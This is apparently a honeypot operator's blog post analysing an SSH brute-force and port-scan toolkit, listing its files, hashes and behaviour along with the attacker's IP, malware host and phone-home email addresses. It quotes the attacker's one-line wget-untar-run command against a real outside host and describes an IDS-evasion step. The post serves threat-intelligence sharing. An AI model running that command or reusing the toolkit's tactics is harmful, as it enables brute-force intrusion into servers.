Skip navigation

Monthly Archives: January 2013

After successfully brute forcing their way into kippo, the attacker downloaded a collection of bruteforce/portscan tools, untarred them, and kicked the whole thing off.

dev:~# wget qiss.ucoz.com/go.jpg;tar xzvf go.jpg;rm -rf go.jpg;cd go;./go 61

The malware itself seemed mostly unmodified from the last time it was reported on, but the address it phones home to was different, so I thought I’d post this so anyone dealing with the same sample has a record of movements.

    Files:

1, 2, 3, 4, 5, 6, common
– these are just lists of usernames/passwords

a
– aab6510d149ddfbdf3598c4b94c4b7b3
– executes ‘pscan2’
– copies each password list into ‘mfu.txt’, and then launches ‘ssh-scan 100’

ssh-scan
– a213ebd69fbc11d612d0374b373f65d8

gen-pass.sh
– 615c08bb1acdf2f21490450991766187
– takes a list of users and passwords, dumps all user:pass permutations into ‘pass_file’

pass-file
– the user:pass permutations from ‘gen-pass.sh’

screen
– cbf0f41bbbafb1c2609bedb943be3b36

go
– 92c4c68480e699aa012b26c82a787248
– sorts ‘bios.txt’ into a unique list, saves in ‘mfu.txt’, launches ‘./ssh-scan 300’

pscan2
– acba0143d0cbcf8092b8b44d914d7983
– given a block and a port, answers with responding ips in that block

secure
– 39acbfc1e983e45308cdab2d3ec4bf34
– a bash script that checks if you are root. If you are, it renames ‘/usr/bin/mail’. This is presumably to mess with any IDS on the system.

ss
– b51a52c9c82bb4401659b4c17c60f89f
– responsible for the content in ‘bios.txt’

vuln.txt
– contains the results from ‘a’

scam
– gathers system information, saves it to ‘info2’, mails it to mafia89tm@yahoo.com
– given the first 3 quarters of an IP address, executes ‘a’ on each of the 255 addresses within that space
– periodically, the results are mailed home to amadeoantiq@yahoo.com
– the author has also never heard of a for loop, as there are 255 lines of this:

./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16
./a $1.17
./a $1.18
./a $1.19
./a $1.20

    Wall of Shame:

Attack Source: 79.117.232.182
Malware Host: qiss.ucoz.com/go.jpg
Malware Type: portscan / bruteforce
Phones Home: mafia89tm@yahoo.com / amadeoantiq@yahoo.com